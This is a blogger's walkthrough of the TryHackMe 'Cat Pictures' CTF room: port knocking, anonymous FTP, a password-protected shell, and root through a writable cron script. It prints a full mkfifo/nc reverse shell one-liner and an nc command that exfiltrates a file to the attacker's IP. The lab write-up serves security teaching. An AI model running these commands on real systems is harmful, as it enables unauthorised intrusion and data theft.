THM: Cat Pictures
Cat Pictures
I made a forum where you can post cute cat pictures!
Easy rated. This is Cat Pictures from THM. Ratings are weird; I did Linux Server Forensics the other day which is Medium rated; I’m not going to bother writing it up because it was so straightforward. Anyway. This one sounds like it might be a file upload vulnerability or something? Turns out it’s not …
Ports
The description sounds like a web challenge; what do we get?
SSH, an unknown service on port 4420, and an HTTP proxy on 8080. Guess that last one is our target, but first let’s check 4420.
4420
┌──(root💀kali)-[/opt/thm/catpictures]
└─# nc 10.10.137.126 4420
INTERNAL SHELL SERVICE
please note: cd commands do not work at the moment, the developers are fixing it at the moment.
do not use ctrl-c
Please enter password:
asd
Invalid password...
Connection ClosedI guess we can always bruteforce it if we have to.
8080
The homepage for the website is a bulletin board, and there is a link to one forum topic. If we go there, we get this in the post:
Post cat pictures here!
Post by user » Wed Mar 24, 2021 8:33 pm
POST ALL YOUR CAT PICTURES HERE
Knock knock! Magic numbers: 1111, 2222, 3333, 4444
Well, we should knock then:
┌──(root💀kali)-[/opt/thm/catpictures]
└─# knock 10.10.137.126 1111 2222 3333 4444
┌──(root💀kali)-[/opt/thm/catpictures]
└─# rustscan -a 10.10.137.126 --ulimit 5000 -b 2000
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.137.126:22
Open 10.10.137.126:21
Open 10.10.137.126:4420
Open 10.10.137.126:8080It seems we now have FTP.
FTP
The FTP is anonymous login only and we cannot PUT. There is a single file we can download, which has a password in it. With that, it’s back to Port 4420.
4420, again
┌──(root💀kali)-[/opt/thm/catpictures]
└─# nc 10.10.137.126 4420
INTERNAL SHELL SERVICE
please note: cd commands do not work at the moment, the developers are fixing it at the moment.
do not use ctrl-c
Please enter password:
sardinethecat
Password acceptedWe have a limited shell. Enumerating finds a (binary) file called runme, but it won’t run in the limited shell. I get a reverse shell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.10.123 1234 >/tmp/f
and I can run the binary; it wants a password. However, the password is not the one we already have. I exfil the file with nc:
┌──(root💀kali)-[/opt/thm/catpictures]
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.9.10.123] from (UNKNOWN) [10.10.137.126] 49106
/bin/sh: 0: can't access tty; job control turned off
# cd /home/catlover
# nc 10.9.10.123 1235 < runmeAnd a listener:
┌──(root💀kali)-[/opt/thm/catpictures]
└─# nc -l -p 1235 > runme Once I get the file, strings is all that’s required:
┌──(root💀kali)-[/opt/thm/catpictures]
└─# strings runme
/lib64/ld-linux-x86-64.so.2
__gmon_start__
# etc
rebecca
Please enter yout password:
Welcome, catlover! SSH key transfer queued!
touch /tmp/gibmethesshkey
Access Denied
# more etcSo let’s do that:
# ./runme
Please enter yout password: rebecca
Welcome, catlover! SSH key transfer queued! SSH
The key is written to /home/catlover/id_rsa and once we have it we can SSH in:
┌──(root💀kali)-[/opt/thm/catpictures]
└─# nano id_rsa
┌──(root💀kali)-[/opt/thm/catpictures]
└─# chmod 600 id_rsa
┌──(root💀kali)-[/opt/thm/catpictures]
└─# ssh -i id_rsa catlover@10.10.137.126
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-142-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information disabled due to load higher than 1.0
52 updates can be applied immediately.
25 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
Last login: Fri Jun 4 14:40:35 2021
root@7546fa2336d6:/# And at this point we are root in a Docker container and we can get Flag 1.
Root, but actually
The root part isn’t a traditional Docker container escape. There is a root script running on a cron job, and it runs in the host.
root@7546fa2336d6:/opt/clean# ls -lash
total 16K
4.0K drwxr-xr-x 2 root root 4.0K May 1 00:20 .
8.0K drwxrwxr-x 1 root root 4.0K Mar 25 16:08 ..
4.0K -rw-r--r-- 1 root root 27 May 1 00:20 clean.shWe can edit it, so I just add a bash reverse shell line and wait a minute:
┌──(root💀kali)-[/opt/thm/catpictures]
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.9.10.123] from (UNKNOWN) [10.10.180.254] 46094
bash: cannot set terminal process group (4964): Inappropriate ioctl for device
bash: no job control in this shell
root@cat-pictures:~# cd /root
cd /root
root@cat-pictures:~# ls -lash
ls -lash
total 60K
4.0K drwx------ 8 root root 4.0K Apr 2 17:37 .
4.0K drwxr-xr-x 23 root root 4.0K Apr 30 19:57 ..
0 lrwxrwxrwx 1 root root 9 Mar 24 13:14 .bash_history -> /dev/null
4.0K -rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
4.0K drwx------ 3 root root 4.0K Mar 31 19:44 .cache
4.0K drwx------ 3 root root 4.0K Mar 24 11:40 .config
4.0K drwxr-xr-x 2 root root 4.0K Apr 2 17:37 firewall
4.0K drwx------ 3 root root 4.0K Mar 24 11:34 .gnupg
4.0K -rw------- 1 root root 28 Apr 2 15:57 .lesshst
4.0K drwxr-xr-x 3 root root 4.0K Mar 24 11:23 .local
4.0K -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
4.0K -rw------- 1 root root 45 Mar 31 19:49 .python_history
4.0K -rw-r--r-- 1 root root 73 Mar 25 09:29 root.txt
4.0K -rw-r--r-- 1 root root 66 Mar 25 09:14 .selected_editor
4.0K drwx------ 2 root root 4.0K Mar 25 12:31 .ssh
4.0K -rw-r--r-- 1 root root 168 Apr 2 14:06 .wget-hsts
root@cat-pictures:~# cat root.txt
cat root.txt
Congrats!!!
Here is your flag:
GO_GET_IT_YOURSELF
root@cat-pictures:~#This was pretty pure CTF but I still enjoyed it. THM haven’t had much interesting content lately so this was okay. I’ve been working on their Autopsy room which is also kind of interesting so I’ll have something to say about that soon.